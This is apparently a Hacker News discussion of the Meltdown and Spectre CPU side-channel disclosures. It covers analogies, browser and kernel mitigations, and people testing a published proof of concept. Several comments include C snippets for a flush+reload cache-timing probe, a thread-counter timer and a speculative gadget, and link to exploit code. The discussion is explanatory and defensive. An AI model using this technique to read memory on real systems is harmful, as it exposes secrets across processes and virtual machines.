Reading privileged memory with a side-channel (googleprojectzero.blogspot.com)
2334 points by brandon on Jan 3, 2018 | 593 comments



An analogy that was useful for explaining part of this to my (non-technical) father. Maybe others will find it helpful as well.

Imagine that you want to know whether someone has checked out a particular library book. The library refuses to give you access to their records and does not keep a slip inside the front cover. You can only see the record of which books you have checked out.

What you do is follow the person of interest into the library whenever they return a book. You then ask the librarian for a copy of the book you want to know whether the person has checked out. If the librarian looks down and says "You are in luck, I have a copy right here!" then you know the person had checked out that book. If the librarian has to go look in the stacks and comes back 5 minutes later with the book, you know that the person didn't check out that book (this time).

The way to make the library secure against this kind of attack is to require that all books be reshelved before they can be lent out again, unless the current borrower is requesting an extension.

There are many other ways to use the behavior of the librarian and the time it takes to retrieve a book to figure out which books a person is reading.

edit: A closer variant. Call the library pretending to be the person and ask for a book to be put on hold. Then watch how long it takes them in the library. If they got that book they will be in and out in a minute (and perhaps a bit confused), if they didn't take that book it will take 5 minutes.


Your analogy is more apt for side-channel attacks in general. Here is a more specific version for Meltdown:

A library has two rooms, one for general books and one for restricted books. The restricted books are not allowed out of the library, and no notes or recordings are allowed to be taken out of the restricted room.

An attacker wants to sneak information out of the restricted room. To do this they pick up a pile of non-restricted books and go into the restricted room. Depending on what they read in there, they rearrange the pile of non-restricted books into a particular order. A guard comes along and sees them; they are thrown out of the restricted room, and their pile of non-restricted books is put on the issue desk ready to be put back into circulation.

Their conspirator looks at the order of the books on the issue desk and decodes a piece of information about the book in the restricted room. They repeat this process about 500000 times a second until they have transcribed the secret book.


I don't understand this explanation :/ Why is the room considered restricted if you can go inside? Do I know all the books that exist in the library? How does the order of the thrown-out books pertain to the secret book?


> Why is the room considered restricted if you can go inside?

That's the bug. The guard only checks to see whether you're supposed to have access after you walk in and start (speculatively) rearranging books. One way to fix this bug would be to have the guard check your access at the door.


What is the analogy behind being able to go into the restricted room?


The restricted room is the part of the machine behind the protection. Memory reads are not checked at the time of access. They are checked when the instruction retires.


On Intel, that is; this isn't a property intrinsic to superscalar processors. Other architectures check it in flight or while it's in the issue queue, preventing this side channel.


You can call into the kernel.

edit: s/call into/trigger a syscall/


You don't even need to do that for meltdown.


I don't understand how this info can be used to get what was inside the book. If my understanding of your explanation is correct, the book name is analogous to a memory address. When the victim (legit process) returned the book with name X (called free on the mem block X), the librarian (OS) erased all pages of the book and repurposed it for printing another book before handing it out to the evil dude (snoopy process).


My attempt, assuming that the books only contain one character each:

The librarian has a list of books you're not allowed to take out. You request one of those books (book X), but it takes a while for the search to run to see whether you're allowed to or not. While you're waiting, you say "actually, I'm not really interested in taking out book X, but if the content of that book is 'a', I'd like to take out book Y. If the content of that book is 'b', I'd like to take out book Y+1, and so on".

The librarian is still waiting for the search to complete to see if you can take out book X, but doesn't have anything better to do, so looks inside it, sees that the letter is 'b', and goes and gets book Y+1 so she can hand it over to you.

Now, the original check to see if you can take the first book out completes, and the librarian says "I'm sorry, I can't let you have book X, and I can't give you the book I fetched that you are allowed to take out, otherwise you'd know the content of the forbidden book."

Now, you request book 'Y', which you are allowed to take out. The librarian goes away for a few minutes, and returns with book 'Y', and hands it over to you. You request book 'Y+1', and she hands it over immediately. You request book 'Y+2', and she goes away for a few minutes again, and hands it over.

You now know that Y+1 was (probably) the book she fetched when you made the forbidden request, and therefore that the letter inside the forbidden book was 'b'.
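
edit: if it helps, here is what the "timing the librarian" step looks like in real code. A minimal flush+reload probe sketch in C (assumes x86 and GCC/Clang intrinsics; probe_array, the 4096-byte stride, and the 100-cycle threshold are my own illustration, not the paper's exact code):

    #include <stdint.h>
    #include <stdio.h>
    #include <x86intrin.h>   /* __rdtscp, _mm_clflush */

    static uint8_t probe_array[256 * 4096]; /* one "book" (cache line) per byte value */

    /* Time a single load; a cache hit is far cheaper than a miss. */
    static uint64_t time_access(volatile uint8_t *addr) {
        unsigned int aux;
        uint64_t start = __rdtscp(&aux);
        (void)*addr;
        return __rdtscp(&aux) - start;
    }

    int main(void) {
        /* "Reshelve" every book: flush all probe lines out of the cache. */
        for (int i = 0; i < 256; i++)
            _mm_clflush(&probe_array[i * 4096]);

        /* ... the speculative read of the forbidden byte would happen here,
           touching probe_array[secret_byte * 4096] as a side effect ... */

        /* Ask for each book and see which one comes back instantly. */
        for (int i = 0; i < 256; i++) {
            uint64_t t = time_access(&probe_array[i * 4096]);
            if (t < 100) /* threshold is machine-dependent */
                printf("secret byte was probably %d\n", i);
        }
        return 0;
    }

The 4096-byte stride keeps each value on its own page so the prefetcher doesn't muddy the signal.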


Great explanation - thank you. One thing I don’t understand is how this can be exploited from javascript. Does it have timing primitives so fine it can tell the difference between a memory lookup served from main memory vs from cache?


Yes it does because javascript execution has had to become very fast. Fast means you can run a very tight loop that updates a counter to create a fairly high-resolution clock.


What I don't understand is how the branch predictor is even exploitable from JavaScript -- it doesn't have pointers. How can it "request" arbitrary memory locations and time the results?


It has byte arrays and indexing on those which is equivalent to having pointers. See page 6 and 7 of the Spectre paper.


So the mid-term fix for js jits should be to gimp indexed array access to the point where an out-of-bounds index value can never enter speculative execution, right? I'm no expert in these low-level things, but I imagine that speculative execution happens only from conditional jumps, and that alternative bounds assurances (e.g. using base+idx%len as the effective address, or limiting access to a sandbox-owned region using a few bitmasks) should be possible that reliably stall the pipeline without allowing speculative access. Obviously this comes at considerable performance cost, but the jit should be able to whitelist certain safe access patterns and/or trusted code sources to not let this get out of hand. Am I missing something?
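
edit: to make the bitmask variant concrete, a hedged C sketch (my own illustration of the idea, not what any actual jit emits):

    #include <stddef.h>
    #include <stdint.h>

    #define BUF_SIZE 4096            /* must be a power of two for the mask trick */
    static uint8_t buf[BUF_SIZE];

    /* The bounds check alone is not enough: the CPU may speculate past
       the branch. The mask is part of the address computation itself,
       so even a speculated load cannot leave buf. */
    uint8_t safe_load(size_t idx) {
        if (idx >= BUF_SIZE)
            return 0;
        return buf[idx & (BUF_SIZE - 1)];
    }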


I believe they made their own "good enough" clock out of a loop in a webworker.


Thanks, this was a great explanation, really simplified it!


I understood with your explanation, thanks!


The person checking out the book is a program, so they aren't the brightest.

They check out the book called "how to go to facebook.com". Then they check out "how to type a password". Then they check out "Typing '1234' for Dummies".

I bet you'll never figure out how to get into their facebook account.


Fantastic explanation of cache timing attacks. This morning I was explaining Spectre to non-technical people and let me tell you, "leaking L1 CPU cache memory" is a real party starter. So I'm using the librarian example going forward.


I used your explanation in a longer note, "Spectre: How do side-channel attacks work?" [1] to try and explain how side-channel attacks work (partly to myself, and partly to non-hackers).

[1]: https://www.facebook.com/notes/petrus-theron/spectre-how-do-...


Thanks for the heads up!


Thank you for this. Would you say this applies to both Spectre and Meltdown, or one and not the other?


This is a general explanation of side channel attacks, as I understand.


Yeah, I don't think it is a perfect analogy for Meltdown. I'll try one; someone correct me if I'm misunderstanding Meltdown.

Let's say you want to know if your boss is away on vacation next week, so you call their admin and say "you need to double-check my contact info if the boss is going to be out next week". They load up the boss's calendar to check and, based on his presence next week, then load up your info. Only once that's done do they take the time to remember that the boss didn't want you to know whether they are in or out. So you hear back, "sorry, can't tell you that", but you follow up with "OK, well, can you still double-check that my phone number is..."

If they respond quickly with a yes, then your file is still on their screen and the boss is in fact out next week. If there is a short pause while they look it up, then the opposite.


A timing attack is one type of side channel attack. These types of timing attacks can also be used against poor/unsuitable crypto functions, or even some processes involving general computation e.g. If it takes longer to reject input A than input B, you can reason that input A is closer to the answer (similar to someone reading a paragraph until they reach the first error).

Other side-channel attacks can come in the form of analysing network data, power-consumption (CPUs use more power when they are "busier")... even noise (listen for when the fans start spinning up).
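
For example, a sketch in C: the first version returns as soon as a byte differs, so its running time reveals how many leading bytes of a guess were right; the second touches every byte no matter what:

    #include <stddef.h>
    #include <stdint.h>

    /* Leaky: bails out at the first mismatch, so timing tells the
       attacker how far their guess matched. */
    int leaky_compare(const uint8_t *a, const uint8_t *b, size_t n) {
        for (size_t i = 0; i < n; i++)
            if (a[i] != b[i])
                return 0;
        return 1;
    }

    /* Constant-time: accumulates differences over the whole input. */
    int ct_compare(const uint8_t *a, const uint8_t *b, size_t n) {
        uint8_t diff = 0;
        for (size_t i = 0; i < n; i++)
            diff |= a[i] ^ b[i];
        return diff == 0;
    }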


Is blinding the only real solution to most of these attacks against Crypto?


Yes, this is a general explanation of side channel attacks against some kind of caching. The more specific example tries to be closer to the type of situation that happens in Spectre, but it is not a direct analogy.


Papers describing each attack:

https://meltdownattack.com/meltdown.pdf

https://spectreattack.com/spectre.pdf

From the spectre paper:

>As a proof-of-concept, JavaScript code was written that, when run in the Google Chrome browser, allows JavaScript to read private memory from the process in which it runs (cf. Listing 2).

Scary stuff.


"Meltdown" is an Intel bug.

"Spectre" is very bad news and affects all modern CPUs. Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh. Otherwise assume that the entire process with jit generated code is open to reading by that code.

Any system which keeps data from multiple customers (or whatever) in the same process is going to be highly vulnerable.
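
To make "insert fences" concrete: the idea is a serializing instruction between the bounds check and the dependent load, so nothing is speculated past the check. A minimal sketch, assuming x86 intrinsics (I'm using lfence here, which is what the published guidance suggests for this pattern; mfence as mentioned above also works and is heavier):

    #include <stddef.h>
    #include <stdint.h>
    #include <immintrin.h>   /* _mm_lfence */

    static uint8_t data[4096];

    uint8_t guarded_load(size_t idx, size_t len) {
        if (idx < len) {
            /* Speculation barrier: the load below will not issue until
               the bounds check has actually resolved. */
            _mm_lfence();
            return data[idx];
        }
        return 0;
    }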


> Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh.

Here's the synchronized announcement from Chrome/Chromium: https://sites.google.com/a/chromium.org/dev/Home/chromium-se...

"Chrome's JavaScript engine, V8, will include mitigations starting with Chrome 64, which will be released on or around January 23rd 2018. Future Chrome releases will include additional mitigations and hardening measures which will further reduce the impact of this class of attack. The mitigations may incur a performance penalty."

Chrome 64 will be hitting stable this month, which means that it ought to be possible to benchmark the performance penalty via testing in Chrome beta. Anybody tried yet?


The mitigations are to disable SharedArrayBuffer and severely round performance.now(). Not good that there aren’t other less intrusive ways to mitigate.


I don't get the impression that those are the full extent of the changes though; I think those two were called out only because they're API changes rather than implementation details. Haven't checked the code so I could be wrong, of course.


A little bit more info can be found here [1]. In particular, site isolation [2] will also assist in protecting against this vulnerability.

[1] https://support.google.com/faqs/answer/7622138#chrome [2] http://www.chromium.org/Home/chromium-security/site-isolatio...


Would it be practical to run each javascript VM in its own sandbox?

Edit: Apparently you can already do something like this. It seems to be an option in Chrome starting with 63 (which was an October release, I believe):

http://www.chromium.org/Home/chromium-security/site-isolatio...


That can't be right because they already round performance.now() so the Spectre attack didn't use it (it instead used a webworker with a tight-loop incrementing a counter)


the tight loop iteration used a shared array buffer to provide a high resolution timer, specifically to deal with the obvious fix of truncating precision of performance.now().

The reason for /further/ truncating performance.now() is that the relative cost in this attack means that you don't need as much precision as was needed for the original (page table? I think) attack.

A SAB timer just needs to increment a counter in one thread and read it in the host thread and the granularity is however long it takes to get through a for-loop.
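
The same trick is easy to reproduce outside the browser. A sketch of a counting-thread clock in C with pthreads (the JS attack does exactly this, with a worker incrementing a cell of a SharedArrayBuffer):

    #include <pthread.h>
    #include <stdint.h>
    #include <stdio.h>

    static volatile uint64_t ticks; /* shared "clock" */

    static void *counter(void *arg) {
        (void)arg;
        for (;;)
            ticks++;  /* one loop iteration = one tick */
        return NULL;
    }

    int main(void) {
        pthread_t t;
        pthread_create(&t, NULL, counter, NULL);

        /* Timing something is just two reads of the counter. */
        uint64_t start = ticks;
        /* ... the memory access being timed goes here ... */
        printf("elapsed: %llu ticks\n",
               (unsigned long long)(ticks - start));
        return 0;
    }

(Reading a plain volatile 64-bit counter from another thread is a data race and not atomic on 32-bit targets; it's good enough here because the attacker only needs a roughly monotonic counter, not a correct one.)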


Thanks, I missed how important SAB was to their webworker timer.


> ...severely round performance.now().

This sucks, and is a side-effect that I didn't even think about. I guess it's probably pretty effective, but it will make benchmarking a lot harder, since you'll probably now have to do a lot more runs.


If it was a big issue you can always introduce a 'benchmark mode' switch that allows you to put resolution back into the counter when you want to run a benchmark. Display a 'WARNING BROWSER INSECURE IN THIS MODE' banner for good measure.


Doubt that. The Firefox news said they will round to 20 us.

That's much more accurate than necessary to benchmark any software code.


Those are the mitigations firefox is doing. Is chrome doing the same?


For some reason, performance.now() and even the performance profiler are capped at 1 millisecond precision on my machine, which makes both pretty much useless. Can only get better for me. :|


From the article it seems it is not 100% sure that AMD and ARM are not affected by Meltdown, only that the authors could not trigger the issue, but they mention this:

"However, for both ARM and AMD, the toy example as described in Section 3 works reliably, indicating that out-of-order execution generally occurs and instructions past illegal memory accesses are also performed."


I would think that any sane implementation would not transmit privileged data to waiting instructions.

Look at their Listing 2: Instructions 5 - 7 will be waiting for the privileged data from line 4 (they are not speculatively executed since they have a data dependency on line 4).

So why is Intel releasing the privileged data to the waiting instructions? An answer could be that violation checking is delayed until retire, but other implementations are possible.

Anyway, so it could be that AMD and ARM are vulnerable, but it's possible that they are not.


There are two different issues.

1. Intel only (so far): related to prefetching privileged memory.

2. More or less everyone: speculatively executing code that has variable execution time.


> I would think that any sane implementation would not transmit privileged data to waiting instructions.

The point of VIPT caches is exactly to use data before all the checks are completed.

It's easy to judge the sanity of things ex post, but maybe it's not that easy if it took 20 years to find the issue.


I don't believe for a second that nobody came up with this idea before. I believe that nobody until now had the motivation to spend the time actually trying to confirm that it's a problem by developing a PoC. Most people would have given up on the idea simply because CPU vendors are not expected to make such a fundamental mistake.


The mistake is clear from the design; that's why all CPU vendors are vulnerable to variants of the same bugs.

Previously side channel attacks like this have been seen by the security community as unreliable things which only work in very specific cases and have to be averaged over millions of runs.

This attack shows a side channel which is general purpose, reliable, and fast.


> The mistake is clear from the design

There is no fundamental reason why speculative instructions should be allowed to mutate the cache.

OTOH the contention-based side channel attack on speculation has been public knowledge for over a decade. [1]

[1] Z. Wang and R. B. Lee, "Covert and Side Channels Due to Processor Architecture," 2006 22nd Annual Computer Security Applications Conference (ACSAC'06), Miami Beach, FL, 2006, pp. 473-482. doi: 10.1109/ACSAC.2006.20


> There is no fundamental reason why speculative instructions should be allowed to mutate the cache.

There is: hundreds of instructions can be in flight speculatively at the same time, especially if you take hyperthreading into account. Good luck rolling them all back.

The question is not whether the cache should be mutated during speculative execution. It's what kinds of speculative execution are allowed, and in some cases it's not even clear if fences should be placed by the programmer (whack-a-mole style), the compiler (not sure how) or the processor (probably not). It's non-obvious enough that how to solve it is to some extent a research problem.


About Meltdown: it was well known even before this that speculative execution has to stop at security boundaries.


> Mitigation is to insert mfence instructions throughout jit generated sandboxed code making it very slow, ugh. Otherwise assume that the entire process with jit generated code is open to reading by that code.

It seems like keeping untrusted code in a separate address space would be a suitable workaround? A lot of comments here seem to be implying that meltdown-style reading of separate address spaces is possible via Spectre, and my read is that it wouldn't.


No, the Spectre paper discusses cross-process attacks too. First, you use BTB poisoning to coerce the victim process to branch-mispredict to code of your choice (a "gadget"). You can get that code to load memory of your choice, which can be the code of shared libraries (which are usually loaded only once into physical memory for all processes). Then you can do timing attacks using the last-level cache to determine whether that memory is in cache.

It's certainly not easy, but it's doable.


This is mitigatable if the attacker process can't send a memory address to the victim process, right? Even if you can poke at the memory for cache prediction misses, if you can't control what the victim process accesses, it seems harder to exploit.

We're all talking about how Spectre is this magic "get access to any memory from any process". But it looks to me like it's a new class of attack, that still requires specific entry points for the software you're trying to attack.

I'd like to be proven wrong on this, but it _feels_ like this is more of a software thing like other timing bugs. In theory you can write software that isn't vulnerable.

EDIT: my reading of the "JS Spectre implementation" is "JIT code runs in the process of the browser + you can write JS code to read the process's own memory". I can imagine messiness with extensions (1Password in particular).


I don't think so. My understanding from the paper is that you don't need to explicitly send a memory address to the victim, you just need a way to communicate with it (e.g. via a socket or some other API) in a way that causes it to do a branch.

Before you trigger the victim process, you perform some steps in your own, hostile, process that teaches the branch predictor where a particular branching operation will likely go. Then you trigger the victim process in the way you know will cause a very similar branching operation.

Even though it's operating within an entirely different process, the branch predictor uses what it learnt in the hostile process to predict the branch result in the victim process. It jumps to the address the hostile process taught it, and starts to speculatively execute code there. Eventually, it figures out it guessed wrong, but by then it's too late, and the information has leaked via a side-channel in a way that the hostile process can detect.

So, essentially, you're using the branch predictor's cache to send the memory address. And you're not sending it to the victim process, you're sending it directly to the CPU. The victim process will never even know it's been attacked, because the branch predictor hides the consequences of its incorrect guess from being detected by conventional means.


this still seems off to me.

I get that the victim process' branch prediction can be messed with. But if my victim process is:

   password = "password"
   secret = "magic BTC wallet secret key"
   while True:
       password_attempt = input()
       if constant_time_compare(password, password_attempt):
           print(secret)
And my input is something like:

   result = ""
   while sys.stdin.peek() not in ['\n', EOF]:
      result += sys.stdin.get()
Then at no point is the victim program really exposing any pointer logic, so not even the victim process will be accessing the `secret` during execution, let alone the hostile process.

The examples given all include arrays provided by the hostile program, and some indexing into the arrays. I definitely see this being an issue in syscalls, but if that's the scope of this, I wouldn't call Spectre a "hardware bug" any more than other timing attacks would be hardware bugs.


The victim code doesn't need to have some explicit pointer arithmetic, it just has to have some sequence of bytes, somewhere in its address space (the "gadget"), that can be used to read a memory address based on a value stored in a register that can be affected by input supplied from the hostile process. The branch prediction is used to speculatively execute that code. The "Example Implementation on Windows" section in the Spectre paper goes into more detail about this.
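
A hypothetical gadget, written as C for readability (in a real attack you're hunting for an equivalent byte sequence that already exists somewhere in the victim's address space; these names are made up):

    #include <stdint.h>

    /* 'x' is attacker-influenced, e.g. derived from a message the
       attacker sent. Executed speculatively at a mispredicted branch
       target, the second load's address encodes one secret byte into
       the cache, where a flush+reload probe can recover it. */
    void gadget(const uint8_t *base, uint64_t x, const uint8_t *probe) {
        uint8_t secret = base[x];             /* load from attacker-chosen offset */
        (void)probe[(uint64_t)secret * 4096]; /* leave a cache footprint */
    }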


After skimming the articles it sounds like a lot hinges on just how hard Spectre is to pull off in practice/in the wild. Anyone have any insights on that?


I don't know much about this particular flaw, but I imagine it'll be pretty hard until someone releases an exploit kit, and then pretty easy after that.


It's an arms race, there will always be new ways of exploiting this flaw in unexpected ways unless speculation is disabled entirely on existing CPUs.


They say they can reliably read memory around 120kB/s with one vulnerability and 1kB/s with the other. It just works, all the time. Some of the PoC takes a few minutes to initialize.

I'd say difficulty level is easy.


However, only one of the PoCs runs on AMD, and that doesn't cross process boundaries.

So how easy is it to turn that PoC into something I should worry about? Seems like browsers are the most affected by this scenario, but that also means harden the browser (separate process per page) and it might be difficult to exploit.


As a general rule of thumb, if everyone already has a PoC, you should assume someone has been doing targeted practical attacks for a while.


Difficulty to exploit is easy once you have the exploit running. Writing a new exploit is really hard, otherwise we wouldn't be starting 2018 with this news.


It doesn't look that hard, and in any case, we will suffer the mitigation consequences either way.


Worse, no mitigation will ever be complete against Spectre, short of flat out disabling speculation across memory loads.


With the right new instructions inserted at the right place, assisted by a good type system, and a processor that does not share its resources like crazy in highly uncontrolled ways, this seems fixable.

Sadly, I feel the only part that won't happen will be the programming language part, but who knows.


It isn't. There have been a few PoCs referenced on Twitter, and the Spectre paper itself references a PoC in browser-hosted javascript (e.g. a random ad can scan memory).

It's obviously not a free, zero-time activity, but I'm going to assume someone making an ad to scan memory isn't super concerned about end user cpu usage or battery life...


"Spectre" is very bad news and affects all modern CPUs

It's not yet clear whether it affects all modern CPUs; notably, I have yet to see any mention of modern POWER/MIPS/SPARC-based designs. If someone has pointers, those particular cases would probably be quite interesting.


https://access.redhat.com/security/vulnerabilities/speculati...

Additional exploits for other architectures are also known to exist. These include IBM System Z, POWER8 (Big Endian and Little Endian), and POWER9 (Little Endian).


It affects CPUs that do speculative execution. Pretty sure some POWERs do.


I wonder to what degree some systems are affected. I believe Solaris already uses separate address spaces on SPARC for user and kernel. I haven’t looked over the SPARC architecture manual to see if they allow speculative execution beyond privilege boundaries.


That only prevents reading across a higher privilege boundary (the Meltdown vulnerability); it doesn't protect against the arbitrary userland reads from Spectre.


I've thrown the C code in the Spectre paper up if anyone wants to feel the magic: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...


Just tested this on systems of varying age.

Works on processors going back as far as 2007 (the oldest I have access to now is an Athlon 64 X2 6000+), but the example code relies on an instruction that the Atom D510 does not support.

Because Spectre seems to be an intrinsic problem with out-of-order execution, which is almost as old as the FDIV bug in Intel processors, I would be very surprised if the Atom D510 did not turn out to be susceptible using other methods as outlined in the paper.

EDIT: I originally suspected this instruction was CLFLUSH and erroneously claimed the D510 doesn't support sse2. It does support sse2, so it must be that it does not support the RDTSCP instruction used for timing.

EDIT: This gets very interesting. I made some modifications to use a CPUID followed by RDTSC, which now runs without illegal instructions and works everywhere the previous version worked. Except on the D510, this runs but I cannot get the leak to happen despite exploring values of CACHE_HIT_THRESHOLD. Could the Atom D510 really be immune from Spectre?
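
For reference, the substitution looks roughly like this (inline asm, since there's no portable intrinsic for CPUID-as-a-barrier; assumes x86-64 and GCC/Clang):

    #include <stdint.h>

    /* RDTSCP reads the time-stamp counter and partially serializes.
       On CPUs without it, CPUID serializes and plain RDTSC reads
       the counter. */
    static inline uint64_t rdtsc_serialized(void) {
        uint32_t lo, hi;
        __asm__ volatile("cpuid\n\t"   /* serialize */
                         "rdtsc"       /* read TSC into edx:eax */
                         : "=a"(lo), "=d"(hi)
                         : "a"(0)
                         : "rbx", "rcx", "memory");
        return ((uint64_t)hi << 32) | lo;
    }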


The D510 might not have speculative execution. https://en.wikipedia.org/wiki/Bonnell_(microarchitecture)


Certain Atom CPUs have neither speculative execution nor OoO execution.


Thanks for this. Would love an annotated version of this if anyone is up for it. My C is pretty good, but some high level "what is being done here" and "this is what shouldn't work" comments would be cool to see.


Worked on an Intel(R) Celeron(R) CPU 847 @ 1.10GHz.

With "gcc (GCC) 7.2.1 20171128", remove the parentheses from the CACHE_HIT_THRESHOLD macro [1] to compile correctly.

[1]: https://gist.github.com/ErikAugust/724d4a969fb2c6ae1bbd7b2a9...


Worked on my system.

(Set cache_hit_threshold to the default value of 80, my cpu is an Intel i7-6700k.)


I thought it was supposed to be exploitable by javascript? If you can get to the machine and run c code, well, that doesn't seem like an exploit?


At its core both vulnerabilities are essentially local privilege escalation bugs (i.e. a random process can read e.g. secret keys from another process), but that still is a very important exploit - if I can run unprivileged C code on e.g. AWS and am able to read the memory of someone else running on the same shared machine, that's really bad.

The Javascript case is the main one that makes it remotely exploitable.


My understanding is it's anything that can make a running process mis-train the CPU core and read the values back. Consider, for example, shared hosts without separate process pools, running code from different users with the same interpreter processes.


Just because it runs in a C PoC does not mean it only runs in C.


From the Spectre whitepaper:

> In addition to violating process isolation boundaries using native code, Spectre attacks can also be used to violate browser sandboxing, by mounting them via portable JavaScript code. We wrote a JavaScript program that successfully reads data from the address space of the browser process running it.

The whitepaper doesn't contain example JS code, however.


This whitepaper describes the Javascript exploit in Section IV. I'm struggling to understand it though: http://www.cs.vu.nl/~herbertb/download/papers/anc_ndss17.pdf


This too was provided as a proof of concept (without explanation): https://brainsmoke.github.io/misc/slicepattern.html. I'm not sure what I'm looking at though


This is the first implementation in Javascript I have seen so far: http://xlab.tencent.com/special/spectre/js/check.js


It is.


Works on an Intel® Core™2 Duo Processor T7200. Had to replace __rdtscp(&junk) with __rdtsc(); the Core 2 doesn't have the former.


Works on MacOS 10.13.2.

Looking back, the Mac patches were to address KPTI (Meltdown), which is separate from Spectre.


Terrifyingly, this seems to work on a DigitalOcean droplet. I'm assuming this means people could potentially read memory from other VMs on the same system, albeit with a great deal of difficulty.


So... it reads a string that was declared at the top of the file?


I think this means we should consider all browser processes to be completely insecure, until mitigations are applied (e.g. Chrome's Site Isolation: https://www.chromium.org/Home/chromium-security/ssca).

Looks like any session token/state could be exfiltrated from your Gmail tab to a malicious JS app running in-process, for example.

Am I overreacting here?


> Am I overreacting here?

Still skimming the paper, but the JS attack appears to be processor-intensive (please chime in if you interpret it differently!). Any widespread, indiscriminate use of such an attack in the wild seems like it would eventually be detected as surely as client-side cryptocurrency mining was discovered. If you aren't a valuable target, if you don't visit sites that are shady enough to discreetly mine bitcoin in your browser, and if you use an adblocker to defang rogue advertisers, then you probably shouldn't lose too much sleep over this (which is not intended to diminish how awesome (in the biblical sense) this attack is).

That said, if there were ever a time to consider installing NoScript, now's it: https://addons.mozilla.org/en-US/firefox/addon/noscript/


And if you're a web developer, now is a good moment to make sure your site works correctly when JS is disabled.


We'll have to dig a time machine out and go back to 1998 then.

I'm being a facetious ass. But you know I'm not wrong, either.


You are wrong. Install the NoScript extension and you can see your site without js. NoScript also allows you to selectively enable js per site on a temporary or permanent basis. This is the default way that I and many other people browse the web.

https://noscript.net/


Just looking around, general available figures for public internet (as opposed to tor) suggest that anywhere between 0.1% to 1.0% of users have JS disabled. These numbers have also been consistently going down over time. That's a fairly small number to dictate how a system should be designed.


That depends on your target demographic. JS is more frequently disabled among tech-literate customers, so a cloud provider's home page would probably benefit from working without JS.


> These numbers have also been consistently going down over time.

That trend might reverse if vulnerabilities like these continue to surface.


Right. It’s like designing for any other tiny group: color blind, blind, people who don’t read any of the 3 languages your site is already translated to, etc.

I’m not saying that shouldn’t be done, but business-wise it's probably usually best to instead add design changes for the latest smartphone screen.

The web isn’t a hypertext graph anymore, it’s a large JavaScript program with a thin html front now.


I think you’re misunderstanding. The person you’re replying to wasn’t saying you couldn’t disable JavaScript. They are saying the websites they and many in the industry develop won’t work like that and haven’t since the turn of the century. That’s what they were claiming to be not wrong about, and they aren’t. Turning on NoScript shows the problem but doesn’t solve it.


"Turn of the century"? JS was used for little more than swapping images on mouseover and changing/"animating" title bar text back then. The "you will see absolutely nothing or a ream of {{blah}} text" without js enabled really only became prevalent in the last 5-or-so years. Even in the halcyon days of jQuery usage you could get around quite comfortably without js, as js was still being used to augment webpages rather than replace them entirely.


It wasn't common practice, but fully Javascript rendered applications were a thing as early as 2001. That was when my company developed the first one that I know of. It was a godawful ugly pig but it worked.

Most sites did nothing like that, but they did use Javascript and would break in various ways without it. At that time, there were a lot of people admonishing web developers to test their applications with Javascript disabled. Sort of like now.

ETA: I had to look it up - XHR was first available in IE 5 as an ActiveX control. The internet at large couldn't really expect it to be available but I believe that is where we first used it.

Initial release: March 18, 1999; 18 years ago


Before XHR, there was an iframe trick that could be used to the same effect. We were abusing that to do streaming updates (stalling requests until the server had new data) on the likes of IE5 back in 2004. WebSocket, eat your heart out! :-)


I'm not denying that the technology was sort of there (especially/only if you were writing a corporate app that targeted one and only one browser, probably as a replacement for an in-house VB/WinForms app). My point, which you mostly reinforced, was that it was not at all common for a user opting not to enable javascript to see a completely broken public-facing site until relatively recently.


That doesn't make the effort required of a developer to remove an existing JS dependency any easier, though, other than allowing them to see how the site breaks which can already be done using the F12 dev tools.

A lot of sites rely on JS to function even at a basic level these days and I think the parent was saying it's unlikely that that's going to change.


As a developer, it's even easier to test without Javascript: open Chrome Developer Tools, select Settings from the hamburger menu, and check "Disable Javascript".

As the other comments point out, though, the biggest problem is that this is economically irrational for most site owners. The figures on JS-disabled usage I had when I was still at Google (3+ years ago now) were at the lower end of TikiTDO's range. It generally doesn't make economic sense to spend developer time on an experience used by 0.1% of users, particularly if this requires compromises for the 99.9% of users who do have JS enabled.


Culling all that JS can make things faster for everyone.

If you have a web app there’s no point, but if you’re displaying text and images and your site doesn’t work without JS, you’ve over-egged a solved problem.

(... While increasing perceived latency, especially for mobile users.)


I'd bet a certain percentage of THOSE were actually lynx/links/elinks users rather than no script users.


you are better off with uMatrix which gives the user significantly more control on what loads/executed: https://github.com/gorhill/uMatrix

(it's the more advanced version of uBlock, from the same dev)


The old NoScript. The new WebExtension compatible version just blocks, it has no way to disable js.


I browse with NoScript and quite a lot of the web works just fine, in fact. I can selectively enable JavaScript for sites that need it, and that I trust.


Why was this downvoted? This is clearly true. I am in fact doing it right now. I am sitting in an airport and clicked around 20 different comment sections and articles from HN so that I could read them later. None of them gave any issues. The only js that I decided to allow was from HN so that I could expand/hide comments.

Does this mean that all websites work? Of course not. But this allows the user to choose which sites to allow to run js. I'm not going to pretend that this is an easy task for non-technical users, but we should be promoting these kinds of habits, not scoffing at them. We should educate as many users as possible that they can still (for now) control much of the web-based code executing on their machines.


Well, it's a severe case of confirmation bias. The people I know that use NoScript-like tools whitelist sites and third parties, which makes it seem like it works better than it really does. Furthermore, they choose not to visit sites that work poorly. All the problems are visible as a new user; sure, it's obviously possible to use NoScript, but I need to whitelist too many sites to be able to say it actually works.


Some sites like NYT wouldn't even render text (!) for me by default with noscript on.

Then there was that time when I read on HN about Forbes loading 35 MB worth of crap (lots of JS too) when you first access it, sure enough it's completely broken with noscript too if you don't allow it.


Yes please!

Long live progressive enhancement and graceful degradation.

At least until we get a JS interpreter with proper permission controls and sandbox limits. Something closer to how Lua is embedded sounds nice.


It seems like practical attacks rely on having a reasonably precise timer available. The spectre paper uses SharedArrayBuffer to synthesize a timer, which is a recent and obscure feature:

https://groups.google.com/a/chromium.org/forum/#!topic/blink...

https://groups.google.com/forum/#!topic/mozilla.dev.platform...

Chrome and Firefox's "intent to ship" posts both contain claims to the effect that there probably aren't any really serious timing channel attacks, which... seems to have been disproved. Why isn't SharedArrayBuffer already being disabled as a stopgap? I think users can turn it off in firefox, how about Chrome?


SharedArrayBuffer will be disabled by default as a stopgap:

https://blog.mozilla.org/security/2018/01/03/mitigations-lan...

performance.now() accuracy is also being reduced.


> I think users can turn it off in firefox, how about Chrome?

This month's stable Chrome release will be outright disabling SharedArrayBuffer until additional mitigations are enacted.


Which sucks for people who've built sites which rely on it.

It isn't exactly polyfillable.


That shouldn't be that many sites. It only hit Chrome stable in July 2017; Firefox in August 2017; and Edge November 2017.


I believe SAB is being disabled, and apparently precision of performance.now() as well? (based on other comments)


about:config javascript.options.shared_memory in Firefox.


Turned off by default for me in 57.0.3/macOS. Is it usually on by default on other platforms?


